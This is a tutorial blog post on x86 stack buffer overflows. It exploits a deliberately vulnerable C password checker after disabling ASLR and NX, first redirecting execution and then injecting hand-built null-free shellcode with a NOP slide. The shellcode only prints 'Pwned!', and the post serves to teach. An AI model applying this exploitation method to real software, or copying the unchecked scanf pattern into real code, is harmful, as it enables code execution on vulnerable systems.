x86 Exploitation 101: when the stack gets over its head

So, as promised, I start here a series of articles dedicated  to the world of exploitation: at the end of this one, I will go deeper with the x86 Assembly series. First thing said: “what is an exploit?”. It could be described as a piece of code (or a series of commands as well) that takes advantage of a software vulnerability in order to execute arbitrary code (mostly arbitrary code execution, privilege escalation and others). The one kind I will describe here is the one applied to buffer overflows, i.e. when datas written into a buffer go over the boundaries of the buffer itself. Well, buffer overflows can affect both stack and heap: I will examine stack buffer overflows before, as they’re definitely easier to understand compared to the heap ones.

I actually found out that it’s easier to start studying the exploitation on Linux and then apply the theory to a Windows system, so this will be the path I will follow (the x86 theory already examined still applies to a Linux system, of course). So, let’s say we have the following program example1.c that checks the validity of a user-typed password by comparing it with an hard-coded one (!). If it’s the case, then the user gets a cookie.

#include <stdio.h>

char *the_good_one = "gb_master";

void cookie()
{
    printf("Get a cookie!\n");
}

char check_password()
{
    char password[64];

    printf("Enter password: ");
    scanf("%s", password);

    if(!strcmp(password, the_good_one))
        return 1;
    else
        return 0;
}

int main(void)
{
    if(check_password())
    {
        printf("GOOOOOOOOOOD!\n");
        cookie();
    }
    else
    {
        printf("Wrong password\n");
    }

    return 0;
}

As you can see, in the check_password function, the scanf function writes into the password[64] local variable without checking the size of the input provided by the user: what if the string typed by the user is longer than 64 characters? Well, buffer overflow happens. Why should I care about a larger string copied into a shorter buffer? Why should I bother?

Well, I explained at this link how the stack works with local variables, but let me show how the stack looks like right after the call at the check_password function. First necessary step: disable the ASLR feature on the Linux machine (ASLR is a protection mechanism that randomized the addresses of the data areas of the program) with the following command:

echo 0 > /proc/sys/kernel/randomize_va_space

I’ll talk about how to circumvent this protection as well, anyway. By the way, as GCC compiles (by default) the code in a slightly different way than the Microsoft compiler, I had to add a few options in order to make it look the most look-a-like and to have a less “traumatizing” experience.

gcc example1.c -m32 -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -zexecstack -o example1

I’ll explain here the options I used:

  • -m32: I’m on a 64-bit machine – as I’m going to examine (for now) 32-bit assembly code, I need to crosscompile with this flag
  • -mpreferred-stack-boundary=2: GCC aligns the stack on a 16 byte boundary, but this makes the generated code less readable. As we don’t need ALL that optimization here, the choice to align on a 4 byte boundary has been made (2^2)
  • -mno-accumulate-outgoing-args: GCC uses by default a series of SUB and MOVs to pass the parameters to the functions. Again, this is an optimization we can disable for readability-sake
  • -zexecstack: disables the NX bit, which is another mechanism to protect from buffer overflow attacks (later I’ll examine how to circumvent this protection as well)

With the help of GDB it is possible to print the stack status at the desired time by placing a breakpoint at the right point of code:

$ gdb -q example1
Reading symbols from example1...(no debugging symbols found)...done.
(gdb) disass check_password
Dump of assembler code for function check_password:
   0x080484bd <+0>:     push   ebp
   0x080484be <+1>:     mov    ebp,esp
   0x080484c0 <+3>:     sub    esp,0x40
   0x080484c3 <+6>:     push   0x80485e8
   0x080484c8 <+11>:    call   0x8048360 <printf@plt>
   0x080484cd <+16>:    add    esp,0x4
   0x080484d0 <+19>:    lea    eax,[ebp-0x40]
   0x080484d3 <+22>:    push   eax
   0x080484d4 <+23>:    push   0x80485f9
   0x080484d9 <+28>:    call   0x80483a0 <__isoc99_scanf@plt>
   0x080484de <+33>:    add    esp,0x8
   0x080484e1 <+36>:    mov    eax,ds:0x804986c
   0x080484e6 <+41>:    push   eax
   0x080484e7 <+42>:    lea    eax,[ebp-0x40]
   0x080484ea <+45>:    push   eax
   0x080484eb <+46>:    call   0x8048350 <strcmp@plt>
   0x080484f0 <+51>:    add    esp,0x8
   0x080484f3 <+54>:    test   eax,eax
   0x080484f5 <+56>:    jne    0x80484fe <check_password+65>
   0x080484f7 <+58>:    mov    eax,0x1
   0x080484fc <+63>:    jmp    0x8048503 <check_password+70>
   0x080484fe <+65>:    mov    eax,0x0
   0x08048503 <+70>:    leave
   0x08048504 <+71>:    ret
End of assembler dump.
(gdb) break *check_password+6
Breakpoint 1 at 0x80484c3
(gdb) r
Starting program: /home/gb_master/example1

Breakpoint 1, 0x080484c3 in check_password ()
(gdb) x/20x $esp
0xffffd220:     0x00000000      0x00ca0000      0x00000001      0x08048321
0xffffd230:     0xffffd49e      0x0000002f      0x08049840      0x08048592
0xffffd240:     0x00000001      0xffffd304      0xffffd30c      0xf7e3d27d
0xffffd250:     0xf7fb13c4      0xf7ffd000      0x0804854b      0xf7fb1000
0xffffd260:     0xffffd268      0x0804850d      0x00000000      0xf7e23a63

The whole stack can be represented in the good old way:

EBP:  0xFFFFD260
ESP:  0xFFFFD220

                        ADDRESS
STACK:   ^              0xFFFFD264:  0x0804850D (EIP address to be restored)
         |      EBP ->  0xFFFFD260:  0xFFFFD268 (previous stack frame)
         |              0xFFFFD25C:  undefined  (password buffer...)
         |              ...
         |      ESP ->  0xFFFFD220:  undefined  (...until here)

So, the password variable address is 0xFFFFD220: what happens if we start writing from here a string longer than the space it was reserved for the variable itself? Well, we would go over 0xFFFFD25F and starting overwriting the address of the previous stack frame and the address of the next instruction to be executed after the current function is over. That is the vulnerability!

Overwriting it with totally invalid data is very simple actually: an input string 64+4+4 characters long is enough to get rid of the correct value of both old-stack-frame value and EIP-value-to-be-restored. Trying is very easy:

$ gdb -q example1
Reading symbols from example1...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/gb_master/example1 
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

That was totally expected: the program restored 0x41414141 (which is the hexadecimal version of “AAAA”) as EIP and it seg-faulted, as there’s nothing there. But this totally means that we can put inside EIP whatever value we want: even the cookie function one. That totally deserves a try, but we need the address of the cookie function before.

(gdb) print *cookie
$1 = {<text variable, no debug info>} 0x80484ab <cookie>

So, now what’s needed is a 64+4 buffer of useless data and 4 bytes containing the cookie address. For clearness sake, I will use the “B” character for the EBP-overwriting part so:

$ python -c 'import sys; sys.stdout.write("A"*64 + "BBBB" + "\xab\x84\x04\x08")' | ./example1
Enter password: Get a cookie!
Segmentation fault

So, we practically executed the cookie function! But it’s still seg-faulting… WHY? That’s because the program restores a bad stack frame (at the 0x42424242 address, which is the hexadecimal version of “BBBB”). But this is cool enough: we changed the execution flow!

The problem here is that we’re relying on some code that was already present in the program: somewhat a half-arbitrary code execution. Not enough! Luckily there’s a way to execute fully-arbitrary code. In order to do that, it’s necessary to write, inside the variable stack space, the arbitrary code, which will be called shellcode, and to have the EIP register pointing at the variable buffer. Obviously the shell code should be the shortest possible, in order to fit into the variable space; also, as usually the writing operation on the variable is performed with a string copy function, the shellcode MUST be (in such situation) NULL-free, i.e. it must not contain the NULL character (otherwise the copy operation would stop before reaching the end of the shellcode). Finally, a shellcode has to rely only on the executable section, without referencing data stored on the data section.

Wikipedia kindly classifies the shellcodes into four categories:

  • Local: a shellcode used to exploit a local vulnerability, usually in a higher-privileged process, in order to gain the same privileges of the vulnerable process
  • Remote: the attacker aims to exploit a vulnerability on another machine usually by sending the shellcode through a TCP/IP connection
  • Download and execute: a remote shellcode that downloads and executes a malware on the target system
  • Staged: a small shellcode that downloads a bigger shellcode into the memory process

As a first example, I’d just print a “Pwned!” string and then exit the program. How could I do this? Well, first thing I need the assembly code of such operation. Using the code of the equivalent compiled C program isn’t advisable, as we’re aiming to have the shortest shellcode possible (and anyway the C program would use the printf function (or an equivalent one). So it’s time to code this by hand. The shortest way to do this, as far as I know, is by calling directly the write system call of the Linux kernel, which needs the following information:

  • File descriptor stored in EBX
  • String address stored in ECX
  • String length stored in EDX

As usual, to perform a system call on Linux, it’s necessary to store the number of the desired system call in EAX (listed in unistd.h) and execute an INT 0x80. I know I didn’t show this x86 ASM instruction, but it wasn’t really necessary at the time: it will be correctly explained later, in the more advanced x86 ASM series. For now it is sufficient to know that executing INT 0x80 on a Linux machine means calling the kernel and executing the desired system call.

At the end of the shell code we MUST exit from the process, otherwise we would execute meaningless code outside the variable containing the shellcode. Doing this is easy, as there is the exit system call provided by the Linux kernel. In the end, I come up with the following code:

section .data

pwned_str       db 'Pwned!'

section .text

global _start

_start:
        mov     eax, 4         ; write system call number
        mov     ebx, 1         ; stdout
        mov     ecx, pwned_str ; string address
        mov     edx, 6         ; string length
        int     0x80

        mov     eax, 1         ; exit system call number
        mov     ebx, 0         ; exit value
        int     0x80

Compiling it, that’s easy, with the follwing commands:

nasm -f elf32 pwned.asm
ld -m elf_i386 pwned.o -o pwned

The precedent commands generated the pwned executables: by executing it, you will realize that it does exactly what we wanted to do. Now we need to get the machine code corresponding to these x86 instructions. Thank God, there’s the objdump application, which makes this very easy:

$ objdump -d pwned -M intel

pwned:     file format elf32-i386


Disassembly of section .text:

08048080 <_start>:
 8048080:       b8 04 00 00 00          mov    eax,0x4
 8048085:       bb 01 00 00 00          mov    ebx,0x1
 804808a:       b9 a4 90 04 08          mov    ecx,0x80490a4
 804808f:       ba 08 00 00 00          mov    edx,0x8
 8048094:       cd 80                   int    0x80
 8048096:       b8 01 00 00 00          mov    eax,0x1
 804809b:       bb 00 00 00 00          mov    ebx,0x0
 80480a0:       cd 80                   int    0x80

Hell, that’s full of NULL characters. Even worse, it uses values from the data section. One problem at a time. Why the 0 values? That’s because we use 32-bit registers and, if we use the MOV instruction with an immediate smaller that 32 bits, the assembler has to fill rest of the register with 0 values somewhat. That’s why.

Well, there’s a way to cheat: using the low 8-bit registers and the XOR instruction, by obtaining:

section .data

pwned_str       db 'Pwned!'

section .text

global _start

_start:
        xor     eax, eax
        xor     ebx, ebx
        xor     ecx, ecx
        xor     edx, edx
        mov     al, 4
        mov     bl, 1
        mov     ecx, pwned_str
        mov     dl, 6
        int     0x80

        mov     al, 1
        xor     ebx, ebx
        int     0x80

And now, objdump:

$ objdump -d pwned -M intel

pwned:     file format elf32-i386


Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    eax,eax
 8048082:       31 db                   xor    ebx,ebx
 8048084:       31 c9                   xor    ecx,ecx
 8048086:       31 d2                   xor    edx,edx
 8048088:       b0 04                   mov    al,0x4
 804808a:       b3 01                   mov    bl,0x1
 804808c:       b9 9c 90 04 08          mov    ecx,0x804909c
 8048091:       b2 06                   mov    dl,0x6
 8048093:       cd 80                   int    0x80
 8048095:       b0 01                   mov    al,0x1
 8048097:       31 db                   xor    ebx,ebx
 8048099:       cd 80                   int    0x80

Wow, that’s cool. And the executable still works. But there is still the string issue. That can be solved with a nice trick:

section .text

global _start

_start:
        jmp     tricky_end

tricky_start:
        xor     eax, eax
        xor     ebx, ebx
        xor     ecx, ecx
        xor     edx, edx
        mov     al, 4
        mov     bl, 1
        pop     ecx
        mov     dl, 6
        int     0x80

        mov     al, 1
        xor     ebx, ebx
        int     0x80
tricky_end:
        call    tricky_start
        db      'Pwned!'

What does this code do? Well, there is a jump to the tricky_end address and the a call to tricky_start is performed. Why? Well, the CALL instruction pushes onto the stack the address of the next instruction to be executed after that a RET instruction is executed: this means that the string address is pushed onto the stack, as I wrote its declaration right after the CALL instruction! Popping it from the stack to the ECX register is enough to have the same result of the previous versions. Objdump, please:

$ objdump -d pwned -M intel

pwned:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       eb 17                   jmp    8048079 <tricky_end>

08048062 <tricky_start>:
 8048062:       31 c0                   xor    eax,eax
 8048064:       31 db                   xor    ebx,ebx
 8048066:       31 c9                   xor    ecx,ecx
 8048068:       31 d2                   xor    edx,edx
 804806a:       b0 04                   mov    al,0x4
 804806c:       b3 01                   mov    bl,0x1
 804806e:       59                      pop    ecx
 804806f:       b2 06                   mov    dl,0x6
 8048071:       cd 80                   int    0x80
 8048073:       b0 01                   mov    al,0x1
 8048075:       31 db                   xor    ebx,ebx
 8048077:       cd 80                   int    0x80

08048079 <tricky_end>:
 8048079:       e8 e4 ff ff ff          call   8048062 <tricky_start>
 804807e:       50                      push   eax
 804807f:       77 6e                   ja     80480ef <tricky_end+0x76>
 8048081:       65                      gs
 8048082:       64                      fs
 8048083:       21                      .byte 0x21

Thank you objdump for trying to parse my string as x86 instructions. Anyway, this shellcode is clean and usable now: you’ll agree that the shellcode itself is the following string

“\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21”

where every byte has been correctly escaped. The shellcode, at the moment, is 36 characters long, definitely shorter than our 64 bytes buffer. We need anyway, to write over the whole buffer in order to overwrite the return value. That’s where the NOP slide technique comes into the game (actually it has another purpose): the technique consists in filling the buffer with a long-enough sequence of NOP instructions followed by the shellcode. The NOP instruction (opcode 0x90) is a special instruction that actually does nothing, just wastes a cycle (it actually performs an XCHG EAX, EAX, i.e. exchanges the value contained into the EAX register with itself).

So, in short we need 64-36 NOP instructions before the shellcode. That’s pretty easy with a python command:

$ python -c 'import sys; sys.stdout.write("\x90"*(64-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21\x0a")' > payload

So I wrote into the payload file our payload. Now we need to attach the rest of the payload that will overwrite the old stack base pointer and the return value. Appending a 4-byte value that will overwrite the EBP-to-be it’s an easy one, as we don’t need a useful value for that:

$ python -c 'import sys; sys.stdout.write("BBBB")' >> payload

What about the returning address? Well, we need the address of the password variable, as that’s where our shellcode is. A nice way to do it is to attach GDB to the running process (which is waiting for user input) and print the variable address:

$ gdb -q -p 6262
Attaching to process 6262
Reading symbols from /home/gb_master/example1...(no debugging symbols found)...done.
Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xf7fdc430 in __kernel_vsyscall ()
(gdb) break *check_password+70
Breakpoint 1 at 0x8048503
(gdb) c
Continuing.

Breakpoint 1, 0x08048503 in check_password ()
(gdb) i r
eax            0x0      0
ecx            0x67     103
edx            0xffffd270       -11664
ebx            0xf7fb1000       -134541312
esp            0xffffd270       0xffffd270
ebp            0xffffd2b0       0xffffd2b0
[...]

The ESP register points to the beginning of our buffer: 0xFFFFD270. Let’s add this address to the shellcode:

$ python -c 'import sys; sys.stdout.write("\x70\xd2\xff\xff")' >> payload

Now, the payload is complete. And we can test it!

$ ./example1 < payload
Pwned!$

That’s it! The string “Pwned!” has been correctly printed and the program exited.

This small series about exploitation is not over yet, as I will show how to spawn a shell with a shellcode and how to circumvent the protection that were added over the years to avoid this kind of vulnerability.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s